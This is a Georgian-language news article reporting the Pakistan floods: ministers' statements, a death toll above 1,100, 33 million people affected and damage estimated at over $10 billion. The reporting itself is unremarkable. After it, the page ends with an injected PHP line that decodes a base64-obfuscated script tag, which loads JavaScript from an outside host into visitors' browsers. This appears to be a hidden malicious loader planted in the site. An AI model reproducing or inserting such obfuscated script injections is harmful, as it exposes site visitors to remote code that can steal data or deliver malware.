celsiusi
ავერსი საქკაბელი
წყალდიდობის გამო პაკისტანის ერთი მესამედი დატბორილია, – ამის შესახებ პაკისტანის კლიმატის მინისტრმა, შერი რეჰმანმა განაცხადა. ინფორმაციას „ბიბისი“ ავრცელებს.
 
რეკორდულად მასშტაბურმა წყალდიდობამ დააზიანა გზები, საცხოვრებელი სახლები და ნათესები. ზოგიერთ სოფელთან გაწყვეტილია კავშირი.
 
„ეს ერთი დიდი ოკეანეა, აღარ არის ხმელეთი, რომ წყალი ამოვტუმბოთ“, – განაცხადა პაკისტანის კლიმატის მინისტრმა, რომელმაც სტიქიას წარმოუდგენელი მასშტაბის კრიზისი უწოდა.
 
პაკისტანის ხელისუფლების მონაცემებით, ივნისიდან, წვიმების სეზონის დაწყების შემდეგ სტიქიას ქვეყანაში სულ მცირე 1 136 ადამიანი ემსხვერპლა. მხოლოდ ბოლო 24 საათის განმავლობაში წყალდიდობის შედეგად პაკისტანში 75 ადამიანი გარდაიცვალა. „ბიბისისთან“ საუბარში პაკისტანის საგარეო საქმეთა მინისტრი ბილავალ ბჰუტო-ზარდარი ამბობს, რომ გარდაცვლილთა ერთი მესამედი ბავშვია.
 
მთავრობა რეკორდულ წვიმასა და წყალდიდობას კლიმატურ ცვლილებებს უკავშირებს.
 
„ფაქტობრივად, პაკისტანის ერთი მესამედი ახლა წყალქვეშაა, რაც აჭარბებს ყველა ზღვარს, რომელიც ოდესმე წარსულში გვინახავს. ჩვენ მსგავსი არასდროს გვინახავს“, – განაცხადა შერი რეჰმანმა.
 
პაკისტანის ხელისუფლების ინფორმაციით, სტიქიამ 33 მილიონი პაკისტანელი დააზარალა. წინასწარი შეფასებით, წყალდიდობით მიყენებული ზარალი 10 მილიარდ დოლარს აჭარბებს.
437
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");